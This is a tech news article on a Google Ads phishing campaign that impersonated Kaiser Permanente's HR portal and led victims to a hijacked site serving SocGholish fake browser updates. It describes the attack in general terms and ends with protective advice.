Skip to content

Phishing campaign targets Kaiser Permanente employees using Google Ads

  • by
  • 3 min read

Cybercriminals launched a malicious campaign targeting Kaiser Permanente employees, leveraging Google Search Ads to masquerade as the healthcare company’s HR portal. The campaign, uncovered on December 15, highlights the growing threat posed by search engine ad abuse and overlapping malicious campaigns.

The fraudulent Google ad appeared when users searched for Kaiser Permanente’s HR portal, a critical resource for employees to access benefits and paystubs. However, instead of leading to the legitimate site, clicking on the ad redirected users to a hijacked website belonging to a defunct Romanian company, Bellona Software.

This compromised website briefly displayed a fake Kaiser Permanente login page before redirecting users to a different screen, urging them to update their browsers. The supposed browser update was part of ‘SocGholish,’ a notorious malware campaign designed to trick victims into downloading and executing malicious scripts.

“We believe the threat actors’ intent was to phish KP employees for their login credentials, but something unexpected happened. Instead, victims who clicked on the ad were redirected to a compromised website that prompted them to update their browser,” researchers noticed.

Sponsored ad showcasing hijacked Romanian software company website. | Source: Malwarebytes

While the campaign’s initial goal appeared to be credential theft from Kaiser Permanente employees, the overlapping presence of ‘SocGholish’ malware introduced a different layer of complexity. It seems that the website used in the phishing attack had already been compromised by a criminal syndicate injecting malicious code into its core JavaScript libraries.

As a result, victims who interacted with the phishing site unknowingly encountered ‘SocGholish.’ This malware campaign uses fake browser updates to collect user data and install additional tools like Cobalt Strike for deeper system compromise, particularly if the victim’s device is deemed valuable enough for a human-operated attack.

SocGholish malware was found on the Bellona Software website. | Source: Malwarebytes

The fake ad was traced to a fraudulent advertiser named ‘Heather Black.’ The ad campaign targeted U.S.-based search users, as confirmed through Google Ads Transparency reports.

The hijacked domain bellonasoftware[.]com, had been previously associated with the now-defunct Romanian software company. Internet Archive snapshots accessed by researchers reveal its legitimate use in 2021 before falling into the hands of cybercriminals who transformed it into a phishing hub.

Victims of this campaign faced dual risks — potential credential theft and malware infection — stemming from the abuse of Google’s ad platform. While Google has been notified about the malicious ad, the ongoing prevalence of similar scams highlights the challenges of maintaining a secure advertising ecosystem.

Researchers have advised users to exercise caution with sponsored search results, avoid clicking on ads that seem suspicious or lead to unfamiliar URLs, and use browser security tools for added protection.

In the News: Serbian authorities target journalists via NoviSpy spyware

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

>